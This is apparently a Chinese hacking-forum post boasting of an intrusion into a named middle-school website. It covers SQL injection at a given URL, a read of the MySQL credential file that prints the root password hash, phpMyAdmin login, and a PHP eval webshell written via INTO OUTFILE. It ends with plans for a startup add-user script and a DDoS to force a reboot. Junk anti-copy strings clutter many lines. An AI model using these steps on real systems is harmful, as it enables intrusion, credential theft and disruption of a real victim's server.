友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
1 p0 H" o6 y% r& T" t) g/ u8 U发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



" [5 f1 e: X. ]' l/ C常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
! X3 o+ C  R0 t
那么想可以直接写入shell ，getshell有几个条件：
3 T! `& w  a. B! v; c! v+ j

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

. h& s  t4 _& C! {! B; M( _试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
6 n4 t" v7 V) d2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7 D" s6 C- F  E4 E' F7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
) j. Z( _& X0 K8 U  N4 {# g
均不行...........................
$ I( ~3 k1 I0 c9 Y  }5 v- B
1 |) n3 r% e/ X) }0 Z御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
( z- p+ l! Y5 {  v5 K
* c' Q4 ?) Q/ J- _) i3 `默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
1 D8 ?2 K, k* d
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
. Y# z3 s& X8 T2 U: z4 z
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
' p- y+ m+ `/ a( `, n
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
5 K: M: `% J4 z/ Z
( F  S& D% o0 Q! D3 k' L- g' W成功读到root密码：
8 q" x: G# w6 n( x- W0 k
( Q% ^5 }$ A6 N3 E5 d# k- V17---- r(0072)
" ]# L* w7 f$ `. n) D18---- o(006f)
19---- o(006f)
5 H" o1 R  m& h4 k' S( l7 }20---- t(0074)
7 U  a0 d7 I- K5 J5 ^' T. w$ g8 F, R/ |21---- *(002a)
22---- 8(0038)
23---- 2(0032)
24---- E(0045)
- C1 L4 D, |* M, ^- G7 J% G25---- 1(0031)
26---- C(0043)
$ P7 e9 P6 @) v! o27---- 5(0035)
0 M6 _0 d" `5 x9 M28---- 8(0038)
29---- 2(0032)
% p: i7 d7 f8 w) H9 w# W' q. r30---- 8(0038)
4 {! @$ C# _7 g31---- A(0041)
32---- 9(0039)
  m& E9 L; D+ V. G; k33---- B(0042)
! t/ I  r) F1 {4 b6 h) z0 |' [34---- 5(0035)
$ f: t; _' _8 ]( K0 t3 K35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
+ A* E6 F6 j+ a  N0 M1 E41---- 1(0031)
. a( ^+ ]8 u  S6 g! ?/ ^$ |42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
$ c% Z. G: i  F$ F6 S8 }45---- 9(0039)
+ M4 `0 S+ H/ ~$ n46---- 8(0038)
6 P6 F' |$ N- d: z47---- F(0046)
48---- F(0046)
49---- 4(0034)
50---- F(0046)
) B2 \: W* ^  s6 E51---- 0(0030)
& p+ a3 z, t2 l3 S1 P52---- 3(0033)
7 V3 |! [+ z& h4 `* ]$ O( s53---- 2(0032)
54---- A(0041)
# k- [- t) N4 n2 [- |: c55---- 4(0034)
56---- A(0041)
57---- B(0042)
: {/ j! M( D. @" O  W58---- *(0044)
9 _7 `9 [2 b$ Q$ A! ]0 w" l+ u59---- *(0035)
, ^9 A' h9 y0 \9 {60---- *(0041)
4 L& {" {0 z, T  [) s3 [/ w6 ]  D61---- *0032)
/ x; l: L5 o- e9 z
解密后成功登陆phpmyamin
5 X6 Q# E' S. e: Y% j                          
% j+ e8 Y6 b* t9 e/ V0 I3 P2 {
/ q2 j6 i% h- w" a% h                             
7 Q5 J3 I5 Y; d2 D. [5 ?, I8 E% S. L9 G
" H* B/ N; X/ f! A  u$ b找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
5 y" Q5 ]  `1 L. _. W/ H: ?
成功执行，拿下shell，菜刀连接：

: i  K) v) e. }5 a% Z1 n# p" [服务器不支持asp,aspx,php提权无果...................
4 H# F1 x# Q0 ]! D& \
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

) [# _" ^6 `( T6 h7 u

别名     administrators
0 {$ q5 v5 s  Z$ P+ o0 o& F注释     管理员对计算机/域有不受限制的完全访问权

成员

7 q! J/ A$ K( Y3 [, ^- ^( P9 O# A

-------------------------------------------------------------------------------
admin
5 T  P3 S  [- i3 dAdministrator
7 I6 w  _7 a0 ^2 bslipper$
; `0 R# v7 C+ N$ H8 K" psqluser
. g& c- _7 T4 D7 L; N7 V- S命令成功完成。
/ N* C6 m/ M9 E: V1 A2 L1 E
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
( d3 }; V7 p. O/ I& u+ w. v
+ d$ i: D3 Y7 p& T  }      

angel